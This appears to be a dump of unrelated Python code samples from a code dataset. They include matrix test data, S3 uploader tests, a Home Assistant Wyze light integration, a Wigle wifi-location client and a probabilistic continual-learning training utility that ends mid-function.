super(Meter, self).__init__(key, tags)
self.lock = Lock()
self.clock = clock
self.clear()
def clear(self):
with self.lock:
self.start_time = self.clock.time()
self.counter = 0.0
self.m1rate = ExpWeightedMovingAvg(period=1, clock=self.clock)
self.m5rate = ExpWeightedMovingAvg(period=5, clock=self.clock)
self.m15rate = ExpWeightedMovingAvg(period=15, clock=self.clock)
def get_one_minute_rate(self):
return self.m1rate.get_rate()
def get_five_minute_rate(self):
return self.m5rate.get_rate()
def get_fifteen_minute_rate(self):
return self.m15rate.get_rate()
def tick(self):
self.m1rate.tick()
self.m5rate.tick()
self.m15rate.tick()
def mark(self, value=1):
with self.lock:
self.counter += value
self.m1rate.add(value)
self.m5rate.add(value)
self.m15rate.add(value)
def get_count(self):
return self.counter
def get_mean_rate(self):
if self.counter == 0:
return 0
elapsed = self.clock.time() - self.start_time
return self.counter / elapsed
def _convertNsRate(self, ratePerNs):
return ratePerNs
| StarcoderdataPython |
145496 | <reponame>gold-standard-phantoms/asldro
""" Test data for test_resampling.py """
import numpy as np
ROT_X_TEST_DATA = (
(
0.00,
np.array(
(
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 1.000000, -0.000000, 0.000000),
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
30.00,
np.array(
(
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 0.866025, -0.500000, 0.000000),
(0.000000, 0.500000, 0.866025, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
45.00,
np.array(
(
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 0.707107, -0.707107, 0.000000),
(0.000000, 0.707107, 0.707107, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
60.00,
np.array(
(
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 0.500000, -0.866025, 0.000000),
(0.000000, 0.866025, 0.500000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
90.00,
np.array(
(
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 0.000000, -1.000000, 0.000000),
(0.000000, 1.000000, 0.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
-90.00,
np.array(
(
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, -1.000000, 0.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
180.00,
np.array(
(
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, -1.000000, -0.000000, 0.000000),
(0.000000, 0.000000, -1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
)
ROT_Y_TEST_DATA = (
(
0.00,
np.array(
(
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 1.000000, 0.000000, 0.000000),
(-0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
30.00,
np.array(
(
(0.866025, 0.000000, 0.500000, 0.000000),
(0.000000, 1.000000, 0.000000, 0.000000),
(-0.500000, 0.000000, 0.866025, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
45.00,
np.array(
(
(0.707107, 0.000000, 0.707107, 0.000000),
(0.000000, 1.000000, 0.000000, 0.000000),
(-0.707107, 0.000000, 0.707107, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
60.00,
np.array(
(
(0.500000, 0.000000, 0.866025, 0.000000),
(0.000000, 1.000000, 0.000000, 0.000000),
(-0.866025, 0.000000, 0.500000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
90.00,
np.array(
(
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 1.000000, 0.000000, 0.000000),
(-1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
-90.00,
np.array(
(
(0.000000, 0.000000, -1.000000, 0.000000),
(0.000000, 1.000000, 0.000000, 0.000000),
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
180.00,
np.array(
(
(-1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 1.000000, 0.000000, 0.000000),
(-0.000000, 0.000000, -1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
)
ROT_Z_TEST_DATA = (
(
0.00,
np.array(
(
(1.000000, -0.000000, 0.000000, 0.000000),
(0.000000, 1.000000, 0.000000, 0.000000),
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
30.00,
np.array(
(
(0.866025, -0.500000, 0.000000, 0.000000),
(0.500000, 0.866025, 0.000000, 0.000000),
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
45.00,
np.array(
(
(0.707107, -0.707107, 0.000000, 0.000000),
(0.707107, 0.707107, 0.000000, 0.000000),
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
60.00,
np.array(
(
(0.500000, -0.866025, 0.000000, 0.000000),
(0.866025, 0.500000, 0.000000, 0.000000),
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
90.00,
np.array(
(
(0.000000, -1.000000, 0.000000, 0.000000),
(1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
-90.00,
np.array(
(
(0.000000, 1.000000, 0.000000, 0.000000),
(-1.000000, 0.000000, 0.000000, 0.000000),
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
180.00,
np.array(
(
(-1.000000, -0.000000, 0.000000, 0.000000),
(0.000000, -1.000000, 0.000000, 0.000000),
(0.000000, 0.000000, 1.000000, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
)
TRANSLATE_TEST_DATA = (
(
(-14.223759, 4.881939, -1.773752,),
np.array(
(
(1.000000, 0.000000, 0.000000, -14.223759),
(0.000000, 1.000000, 0.000000, 4.881939),
(0.000000, 0.000000, 1.000000, -1.773752),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(-1.960535, 14.193102, 2.915844,),
np.array(
(
(1.000000, 0.000000, 0.000000, -1.960535),
(0.000000, 1.000000, 0.000000, 14.193102),
(0.000000, 0.000000, 1.000000, 2.915844),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(1.978111, 15.876991, -8.044660,),
np.array(
(
(1.000000, 0.000000, 0.000000, 1.978111),
(0.000000, 1.000000, 0.000000, 15.876991),
(0.000000, 0.000000, 1.000000, -8.044660),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(6.966244, 8.350882, -2.437151,),
np.array(
(
(1.000000, 0.000000, 0.000000, 6.966244),
(0.000000, 1.000000, 0.000000, 8.350882),
(0.000000, 0.000000, 1.000000, -2.437151),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(2.156701, -11.658439, -11.479528,),
np.array(
(
(1.000000, 0.000000, 0.000000, 2.156701),
(0.000000, 1.000000, 0.000000, -11.658439),
(0.000000, 0.000000, 1.000000, -11.479528),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(1.048747, 7.222540, 25.854913,),
np.array(
(
(1.000000, 0.000000, 0.000000, 1.048747),
(0.000000, 1.000000, 0.000000, 7.222540),
(0.000000, 0.000000, 1.000000, 25.854913),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(-6.668907, 1.873310, -0.824944,),
np.array(
(
(1.000000, 0.000000, 0.000000, -6.668907),
(0.000000, 1.000000, 0.000000, 1.873310),
(0.000000, 0.000000, 1.000000, -0.824944),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
)
SCALE_TEST_DATA = (
(
(-1.976982, -12.078455, 29.080080,),
np.array(
(
(-1.976982, 0.000000, 0.000000, 0.000000),
(0.000000, -12.078455, 0.000000, 0.000000),
(0.000000, 0.000000, 29.080080, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(8.252189, 13.789720, -10.581803,),
np.array(
(
(8.252189, 0.000000, 0.000000, 0.000000),
(0.000000, 13.789720, 0.000000, 0.000000),
(0.000000, 0.000000, -10.581803, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(-4.686156, -2.724694, 10.984246,),
np.array(
(
(-4.686156, 0.000000, 0.000000, 0.000000),
(0.000000, -2.724694, 0.000000, 0.000000),
(0.000000, 0.000000, 10.984246, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(-2.778719, 7.015415, -20.518163,),
np.array(
(
(-2.778719, 0.000000, 0.000000, 0.000000),
(0.000000, 7.015415, 0.000000, 0.000000),
(0.000000, 0.000000, -20.518163, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(-3.538500, -8.235865, -15.770570,),
np.array(
(
(-3.538500, 0.000000, 0.000000, 0.000000),
(0.000000, -8.235865, 0.000000, 0.000000),
(0.000000, 0.000000, -15.770570, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(5.079747, 2.819841, 0.334799,),
np.array(
(
(5.079747, 0.000000, 0.000000, 0.000000),
(0.000000, 2.819841, 0.000000, 0.000000),
(0.000000, 0.000000, 0.334799, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
(
(-13.336779, 11.274923, 3.501794,),
np.array(
(
(-13.336779, 0.000000, 0.000000, 0.000000),
(0.000000, 11.274923, 0.000000, 0.000000),
(0.000000, 0.000000, 3.501794, 0.000000),
(0.000000, 0.000000, 0.000000, 1.000000),
)
),
),
)
| StarcoderdataPython |
1752625 | <reponame>drunkwater/leetcode
# DRUNKWATER TEMPLATE(add description and prototypes)
# Question Title and Description on leetcode.com
# Function Declaration and Function Prototypes on leetcode.com
#796. Rotate String
#We are given two strings, A and B.
#A shift on A consists of taking string A and moving the leftmost character to the rightmost position. For example, if A = 'abcde', then it will be 'bcdea' after one shift on A. Return True if and only if A can become B after some number of shifts on A.
#Example 1:
#Input: A = 'abcde', B = 'cdeab'
#Output: true
#Example 2:
#Input: A = 'abcde', B = 'abced'
#Output: false
#Note:
#A and B will have length at most 100.
#class Solution:
# def rotateString(self, A, B):
# """
# :type A: str
# :type B: str
# :rtype: bool
# """
# Time Is Money | StarcoderdataPython |
1626942 | <gh_stars>0
# -*- coding: utf-8 -*-
from __future__ import print_function, absolute_import, division
import os
import shutil
import tempfile
import logging
import moto
from mock import patch, Mock
from unittest2 import TestCase
import ultimate_source_of_accounts.cli as cli
class UploadTest(TestCase):
"""Test the upload() function that is used for --import=...."""
def setUp(self):
self.tempdir = tempfile.mkdtemp()
self.arguments = {'<destination-bucket-name>': "bucketname42",
'--allowed-ip': ["123", "345"],
'--import': self.tempdir,
'--check-billing': None}
with open(os.path.join(self.tempdir, "foo.yaml"), "w") as config:
config.write("my_account:\n id: 42\n email: <EMAIL>.invalid\n owner: me")
def tearDown(self):
shutil.rmtree(self.tempdir)
@patch("ultimate_source_of_accounts.cli.get_converted_aws_accounts")
@patch("ultimate_source_of_accounts.cli.S3Uploader")
def test_upload_loads_data_from_specified_directory(self, mock_exporter_class, mock_converter):
mock_converter.return_value = {"foo": "bar"}
cli._main(self.arguments)
mock_converter.assert_called_once_with(
{'my_account': {'id': '42', 'email': '<EMAIL>', 'owner': 'me'}})
@patch("ultimate_source_of_accounts.cli.get_converted_aws_accounts")
@patch("ultimate_source_of_accounts.cli.S3Uploader")
def test_upload_calls_all_upload_tasks(self, mock_exporter_class, mock_converter):
"""Mock away S3 Uploader, see if all necessary methods were called"""
mock_converter.return_value = {"foo": "bar"}
mock_exporter_instance = Mock()
mock_exporter_class.return_value = mock_exporter_instance
cli._main(self.arguments)
mock_exporter_class.assert_called_once_with(
"bucketname42",
allowed_ips=["123", "345"],
allowed_aws_account_ids=['42'])
mock_exporter_instance.setup_infrastructure.assert_called_once_with()
mock_exporter_instance.upload_to_S3.assert_called_once_with({'foo': 'bar'})
@patch("ultimate_source_of_accounts.cli.get_converted_aws_accounts")
@patch("ultimate_source_of_accounts.cli.S3Uploader.upload_to_S3")
@patch("ultimate_source_of_accounts.cli.S3Uploader.setup_infrastructure")
@moto.mock_s3
def test_upload_uses_S3Uploader_correctly(self, _, mock_upload, mock_converter):
"""Check if the 'necessary methods' used above actually exist on S3Uploader"""
upload_data = {"foo": "bar"}
mock_converter.return_value = upload_data
cli._main(self.arguments)
mock_upload.assert_called_once_with(upload_data)
@patch("ultimate_source_of_accounts.cli.read_directory")
def test_main_logs_invalid_data(self, read_directory_mock):
message = "This must be logged"
read_directory_mock.side_effect = Exception(message)
with self.assertLogs(level=logging.WARN) as cm:
self.assertRaises(Exception, cli._main, self.arguments)
logged_output = "\n".join(cm.output)
self.assertRegex(logged_output, ".*" + self.tempdir + ".*" + message + ".*")
class CheckTest(TestCase):
"""Test the check_billing() function that is used for --check_billing"""
def test_check_billing_not_yet_implemented(self):
self.assertRaises(SystemExit, cli.check_billing, "foo", "bar")
| StarcoderdataPython |
153735 | #!/usr/bin/python3
"""Platform for light integration."""
import logging
# Import the device class from the component that you want to support
from datetime import timedelta
from typing import Any, List
import homeassistant.util.color as color_util
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_COLOR_TEMP,
ATTR_HS_COLOR,
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR_TEMP,
SUPPORT_COLOR,
LightEntity
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import ATTR_ATTRIBUTION
from homeassistant.core import HomeAssistant
from wyzeapy.base_client import AccessTokenError, Device, DeviceTypes
from wyzeapy.client import Client
from wyzeapy.types import PropertyIDs
from .const import DOMAIN
_LOGGER = logging.getLogger(__name__)
ATTRIBUTION = "Data provided by Wyze"
SCAN_INTERVAL = timedelta(seconds=30)
async def async_setup_entry(hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities):
_LOGGER.debug("""Creating new WyzeApi light component""")
client: Client = hass.data[DOMAIN][config_entry.entry_id]
def get_bulbs() -> List[Device]:
try:
return client.get_bulbs()
except AccessTokenError as e:
_LOGGER.warning(e)
client.reauthenticate()
return client.get_bulbs()
lights = [WyzeLight(client, light) for light in await hass.async_add_executor_job(get_bulbs)]
async_add_entities(lights, True)
class WyzeLight(LightEntity):
"""Representation of a Wyze Bulb."""
_brightness: int
_color_temp: int
_color: str
_on: bool
_available: bool
_just_updated = False
def __init__(self, client: Client, device: Device):
"""Initialize a Wyze Bulb."""
self._device = device
self._device_type = DeviceTypes(self._device.product_type)
if self._device_type not in [
DeviceTypes.LIGHT,
DeviceTypes.MESH_LIGHT
]:
raise AttributeError("Device type not supported")
self._client = client
@property
def device_info(self):
return {
"identifiers": {
(DOMAIN, self._device.mac)
},
"name": self.name,
"manufacturer": "WyzeLabs",
"model": self._device.product_model
}
@property
def should_poll(self) -> bool:
return True
@staticmethod
def translate(value, input_min, input_max, output_min, output_max):
if value is None:
return None
# Figure out how 'wide' each range is
left_span = input_max - input_min
right_span = output_max - output_min
# Convert the left range into a 0-1 range (float)
value_scaled = float(value - input_min) / float(left_span)
# Convert the 0-1 range into a value in the right range.
return output_min + (value_scaled * right_span)
def turn_on(self, **kwargs: Any) -> None:
pids = []
if kwargs.get(ATTR_BRIGHTNESS) is not None:
_LOGGER.debug("Setting brightness")
self._brightness = self.translate(kwargs.get(ATTR_BRIGHTNESS), 1, 255, 1, 100)
pids.append(self._client.create_pid_pair(PropertyIDs.BRIGHTNESS, str(int(self._brightness))))
if kwargs.get(ATTR_COLOR_TEMP) is not None:
_LOGGER.debug("Setting color temp")
self._color_temp = self.translate(kwargs.get(ATTR_COLOR_TEMP), 500, 140, 2700, 6500)
pids.append(self._client.create_pid_pair(PropertyIDs.COLOR_TEMP, str(int(self._color_temp))))
if self._device_type is DeviceTypes.MESH_LIGHT and kwargs.get(ATTR_HS_COLOR) is not None:
_LOGGER.debug("Setting color")
self._color = color_util.color_rgb_to_hex(*color_util.color_hs_to_RGB(*kwargs.get(ATTR_HS_COLOR)))
pids.append(self._client.create_pid_pair(PropertyIDs.COLOR, self._color))
_LOGGER.debug("Turning on light")
try:
self._client.turn_on(self._device, pids)
except AccessTokenError:
self._client.reauthenticate()
self._client.turn_on(self._device, pids)
self._on = True
self._just_updated = True
def turn_off(self, **kwargs: Any) -> None:
try:
self._client.turn_off(self._device)
except AccessTokenError:
self._client.reauthenticate()
self._client.turn_off(self._device)
self._on = False
self._just_updated = True
@property
def name(self):
"""Return the display name of this light."""
return self._device.nickname
@property
def unique_id(self):
return self._device.mac
@property
def available(self):
"""Return the connection status of this light"""
return self._available
@property
def hs_color(self):
return color_util.color_RGB_to_hs(*color_util.rgb_hex_to_rgb_list(self._color))
@property
def device_state_attributes(self):
"""Return device attributes of the entity."""
return {
ATTR_ATTRIBUTION: ATTRIBUTION,
"state": self.is_on,
"available": self.available,
"device model": self._device.product_model,
"mac": self.unique_id
}
@property
def brightness(self):
"""Return the brightness of the light.
This method is optional. Removing it indicates to Home Assistant
that brightness is not supported for this light.
"""
return self.translate(self._brightness, 1, 100, 1, 255)
@property
def color_temp(self):
"""Return the CT color value in mired."""
return self.translate(self._color_temp, 2700, 6500, 500, 140)
@property
def is_on(self):
"""Return true if light is on."""
return self._on
@property
def supported_features(self):
if self._device_type is DeviceTypes.MESH_LIGHT:
return SUPPORT_BRIGHTNESS | SUPPORT_COLOR_TEMP | SUPPORT_COLOR
return SUPPORT_BRIGHTNESS | SUPPORT_COLOR_TEMP
def update(self):
if not self._just_updated:
try:
device_info = self._client.get_info(self._device)
except AccessTokenError:
self._client.reauthenticate()
device_info = self._client.get_info(self._device)
for property_id, value in device_info:
if property_id == PropertyIDs.BRIGHTNESS:
self._brightness = int(value)
elif property_id == PropertyIDs.COLOR_TEMP:
try:
self._color_temp = int(value)
except ValueError:
self._color_temp = 2700
elif property_id == PropertyIDs.ON:
self._on = True if value == "1" else False
elif property_id == PropertyIDs.AVAILABLE:
self._available = True if value == "1" else False
elif self._device_type is DeviceTypes.MESH_LIGHT and property_id == PropertyIDs.COLOR:
self._color = value
else:
self._just_updated = False
| StarcoderdataPython |
73579 | <filename>recipes/Python/578637_Wigle_wifi/recipe-578637.py
from uuid import getnode
import re
import requests
class WigleAgent():
def __init__(self, username, password):
self.agent(username, password)
self.mac_address()
def get_lat_lng(self, mac_address=None):
if mac_address == None:
mac_address = self.mac_address
if '-' in mac_address:
mac_address = mac_address.replace('-', ':')
try:
self.query_response = self.send_query(mac_address)
response = self.parse_response()
except IndexError:
response = 'MAC location not known'
return response
def agent(self, username, password):
self.agent = requests.Session()
self.agent.post('https://wigle.net/api/v1/jsonLogin',
data={'credential_0': username,
'credential_1': password,
'destination': '/https://wigle.net/'})
def mac_address(self):
mac = hex(getnode())
mac_bytes = [mac[x:x+2] for x in xrange(0, len(mac), 2)]
self.mac_address = ':'.join(mac_bytes[1:6])
def send_query(self, mac_address):
response = self.agent.post(url='https://wigle.net/api/v1/jsonLocation',
data={'netid': mac_address,
'Query2': 'Query'})
return response.json()
def parse_response(self):
lat = self.get_lat()
lng = self.get_lng()
return lat, lng
def get_lat(self):
resp_lat = self.query_response['result'][0]['locationData'][0]['latitude']
return float(resp_lat)
def get_lng(self):
resp_lng = self.query_response['result'][0]['locationData'][0]['longitude']
return float(resp_lng)
if __name__ == "__main__":
wa = WigleAgent('your-username', 'your-key')
print wa.get_lat_lng('00:1C:0E:42:79:43')
| StarcoderdataPython |
3290749 | <reponame>msabramo/ibehave
from behave import given, when, then
class BlackHole(object):
pass
@given('we have {number:d} black holes')
def given_blackholes(context, number):
context.response = tuple(BlackHole() for _ in range(number))
context.collided = False
@given('a big L')
def given_big_l(context):
context.has_l = True
@when('the holes collide')
def when_they_collide(context):
context.collided = True
@then('we detect shockwaves')
def then_detect_shockwaves(context):
assert getattr(context, "has_l", False) is True
assert len(context.response) > 1
| StarcoderdataPython |
1634497 | import sys
sys.setrecursionlimit(2 ** 8)
read = sys.stdin.readline
n = int(read())
# 빈 배열을 생성한다.
# 초기 값은 빈 공간으로 준다.
pattern = [[' '] * n for _ in range(n)]
# 시작 점 (0, 0, n)을 준다.
# -- recursion 함수 --
# 매개변수 (x, y, multiple)
# multiple : 3의 배수
def recursion(cur_x, cur_y, cur_n):
# 만약, multiple가 1이라면 현재 위치는 *를 찍는 공간이다.
if cur_n == 1:
pattern[cur_x][cur_y] = "*"
return
# 아니라면, 다음 차례를 위해 multiple을 3으로 나누어 다음 차례 3의 배수 값을 얻는다.
cur_n //= 3
# 이제 for문을 돌리는데 패턴 구간을 돌린다. x, y좌표로 문제에 나와있는 패턴 처럼
# i : 0 ~ 2까지, j : 0 ~ 2까지
# 만약 (1, 1)은 비워야 하는 점이기에 패스하고 나머지는 재귀함수를 돌린다.
# 재귀 (x + (i * 3으로 나눈 muliple), y + (j * 3으로 나눈 muliple), 3으로 나눈 multiple)
for i in range(3):
for j in range(3):
if i == 1 and j == 1:
continue
else:
recursion(cur_x + (i * cur_n), cur_y + (j * cur_n), cur_n)
# -- recursion 함수 --
recursion(0, 0, n)
# 이제 출력을 한다.행렬로 출력을 한다.
for in_pattern in pattern:
print(''.join(map(str, in_pattern)))
| StarcoderdataPython |
33368 | class Pattern_Twenty_Six:
'''Pattern twenty_six
***
* *
*
* ***
* *
* *
***
'''
def __init__(self, strings='*'):
if not isinstance(strings, str):
strings = str(strings)
for i in range(7):
if i in [0, 6]:
print(f' {strings * 3}')
elif i in [1, 4, 5]:
print(f'{strings} {strings}')
elif i == 3:
print(f'{strings} {strings * 3}')
else:
print(strings)
if __name__ == '__main__':
Pattern_Twenty_Six()
| StarcoderdataPython |
97285 | <reponame>chrhenning/posterior_replay_cl<filename>probabilistic/prob_cifar/train_utils.py
#!/usr/bin/env python3
# Copyright 2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @title :probabilistic/prob_cifar/train_utils.py
# @author :ch
# @contact :<EMAIL>
# @created :01/30/2020
# @version :1.0
# @python_version :3.6.9
"""
Training utilities
------------------
A collection of helper functions for training scripts of this subpackage.
"""
from argparse import Namespace
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import torch
from torch.nn import functional as F
from warnings import warn
from data.special.permuted_mnist import PermutedMNIST
from hnets.chunked_mlp_hnet import ChunkedHMLP
from hnets.hnet_helpers import init_conditional_embeddings
from hnets.hnet_perturbation_wrapper import HPerturbWrapper
from hnets.mlp_hnet import HMLP
from hnets.structured_hmlp_examples import resnet_chunking, wrn_chunking
from hnets.structured_mlp_hnet import StructuredHMLP
from probabilistic import GaussianBNNWrapper
from probabilistic import prob_utils as putils
from probabilistic.regression import train_utils as rtu
from probabilistic.prob_cifar import hpsearch_config_resnet_avb as hpresnetavb
from probabilistic.prob_cifar import hpsearch_config_resnet_avb_pf as \
hpresnetavbpf
from probabilistic.prob_cifar import hpsearch_config_zenke_avb as hpzenkeavb
from probabilistic.prob_cifar import hpsearch_config_zenke_avb_pf as \
hpzenkeavbpf
from probabilistic.prob_cifar import hpsearch_config_zenke_bbb as hpzenkebbb
from probabilistic.prob_cifar import hpsearch_config_resnet_bbb as hpresnetbbb
from probabilistic.prob_cifar import hpsearch_config_resnet_ewc as hpresnetewc
from probabilistic.prob_cifar import hpsearch_config_resnet_mt as hpresnetmt
from probabilistic.prob_cifar import hpsearch_config_resnet_ssge as hpresnetssge
from probabilistic.prob_cifar import hpsearch_config_resnet_ssge_pf as \
hpresnetssgepf
from probabilistic.prob_gmm import hpsearch_config_gmm_bbb as hpgmmbbb
from probabilistic.prob_gmm import hpsearch_config_gmm_ewc as hpgmmewc
from probabilistic.prob_gmm import hpsearch_config_gmm_avb as hpgmmavb
from probabilistic.prob_gmm import hpsearch_config_gmm_avb_pf as hpgmmavbpf
from probabilistic.prob_gmm import hpsearch_config_gmm_ssge as hpgmmssge
from probabilistic.prob_gmm import hpsearch_config_gmm_ssge_pf as hpgmmssgepf
from probabilistic.prob_mnist import train_utils as pmutils
from probabilistic.prob_mnist import hpsearch_config_split_avb as hpsplitavb
from probabilistic.prob_mnist import hpsearch_config_split_avb_pf as \
hpsplitavbpf
from probabilistic.prob_mnist import hpsearch_config_perm_avb as hppermavb
from probabilistic.prob_mnist import hpsearch_config_perm_avb_pf as \
hppermavbpf
from probabilistic.prob_mnist import hpsearch_config_perm_bbb as hppermbbb
from probabilistic.prob_mnist import hpsearch_config_perm_ewc as hppermewc
from probabilistic.prob_mnist import hpsearch_config_perm_mt as hppermmt
from probabilistic.prob_mnist import hpsearch_config_split_bbb as hpsplitbbb
from probabilistic.prob_mnist import hpsearch_config_split_ewc as hpsplitewc
from probabilistic.prob_mnist import hpsearch_config_split_mt as hpsplitmt
from probabilistic.prob_mnist import hpsearch_config_split_ssge as \
hpsplitssge
from probabilistic.prob_mnist import hpsearch_config_split_ssge_pf as \
hpsplitssgepf
from utils import gan_helpers as gan
from utils import sim_utils as sutils
from utils import torch_utils as tutils
def generate_networks(config, shared, logger, data_handlers, device,
create_mnet=True, create_hnet=True, create_hhnet=True,
create_dis=True):
"""Create the networks required for training with implicit distributions.
This function will create networks based on user configuration.
This function also takes care of weight initialization.
Args:
config (argparse.Namespace): Command-line arguments.
shared (argparse.Namespace): Miscellaneous data shared among training
functions.
logger: Console (and file) logger.
data_handlers: List of data handlers, one for each task. Needed to
extract the number of inputs/outputs of the main network. And to
infer the number of tasks.
device: Torch device.
create_mnet (bool, optional): If ``False``, the user can force that no
main network is generated.
create_hnet (bool, optional): If ``False``, the user can force that no
hypernet ``hnet`` is generated.
Note:
Even if ``True``, the ``hnet`` is only generated if the user
configuration ``config`` requests it.
create_hhnet (bool, optional): If ``False``, the user can force that no
hyper-hypernet ``hhnet`` is generated.
Note:
Even if ``True``, the ``hhnet`` is only generated if the user
configuration ``config`` requests it.
create_dis (bool, optional): If ``False``, the user can force that no
discriminator ``dis`` is generated.
Note:
Even if ``True``, the ``dis`` is only generated if the user
configuration ``config`` requests it.
Returns:
(tuple): Tuple containing:
- **mnet**: Main network instance.
- **hnet** (optional): Hypernetwork instance. This return value is
``None`` if no hypernetwork should be constructed.
**hhnet** (optional): Hyper-hypernetwork instance. This return value
is ``None`` if no hyper-hypernetwork should be constructed.
- **dis** (optional): Discriminator instance. This return value is
``None`` if no discriminator should be constructed.
"""
num_tasks = len(data_handlers)
if hasattr(config, 'cl_scenario'):
num_heads = 1 if config.cl_scenario == 2 else num_tasks
else:
assert hasattr(config, 'multi_head')
num_heads = num_tasks if config.multi_head else 1
# Sanity check!
for i in range(1, num_tasks):
assert np.prod(data_handlers[i].in_shape) == \
np.prod(data_handlers[0].in_shape)
if data_handlers[0].classification:
assert data_handlers[i].num_classes == data_handlers[0].num_classes
else:
assert np.prod(data_handlers[i].out_shape) == \
np.prod(data_handlers[0].out_shape)
# Parse user "wishes".
use_hnet = False
use_hhnet = False
use_dis = False
no_mnet_weights = False
if hasattr(config, 'mnet_only'):
use_hnet = not config.mnet_only
use_hhnet = not config.mnet_only and not shared.prior_focused and \
not config.no_hhnet
# Note, without the hypernet, there is no weight distribution and therefore
# no discriminator needed.
use_dis = use_hnet and not config.no_dis
no_mnet_weights = not config.mnet_only
if hasattr(config, 'distill_iter'):
# Note, if distillation is used, the hnet is first trained independent
# of a hyper-hypernetwork, which is why it needs its own weights.
no_hnet_weights = use_hhnet and config.distill_iter == -1
else:
no_hnet_weights = use_hhnet
####################
### Main network ###
####################
if 'gmm' in shared.experiment_type or \
'regression' in shared.experiment_type:
mnet_type = 'mlp'
in_shape = data_handlers[0].in_shape
elif 'mnist' in shared.experiment_type:
if hasattr(config, 'net_type'):
logger.debug('Main network will be of type: %s.' % config.net_type)
mnet_type = config.net_type
else:
logger.debug('Main network will be an MLP.')
mnet_type = 'mlp'
assert len(data_handlers[0].in_shape) == 3 # MNIST
in_shape = data_handlers[0].in_shape
# Note, that padding is currently only applied when transforming the
# image to a torch tensor.
if isinstance(data_handlers[0], PermutedMNIST):
assert len(data_handlers[0].torch_in_shape) == 3 # MNIST
in_shape = data_handlers[0].torch_in_shape
else:
assert 'cifar' in shared.experiment_type
in_shape = [32, 32, 3]
if 'zenke' in shared.experiment_type:
assert not hasattr(config, 'net_type')
mnet_type = 'zenke'
else:
assert 'resnet' in shared.experiment_type
mnet_type = config.net_type
if mnet_type == 'mlp':
if len(in_shape) > 1:
n_x = np.prod(in_shape)
in_shape = [n_x]
else:
assert len(in_shape) == 3
assert mnet_type in ['lenet', 'resnet', 'wrn', 'iresnet', 'zenke']
if data_handlers[0].classification:
out_shape = [data_handlers[0].num_classes * num_heads]
else:
assert len(data_handlers[0].out_shape) == 1
out_shape = [data_handlers[0].out_shape[0] * num_heads]
if not create_mnet:
# FIXME We would need to allow the passing of old `mnet`s.
raise NotImplementedError('This function doesn\'t support yet to ' +
'construct networks without constructing ' +
'a main network first.')
logger.info('Creating main network ...')
mnet_kwargs = {}
if mnet_type == 'iresnet':
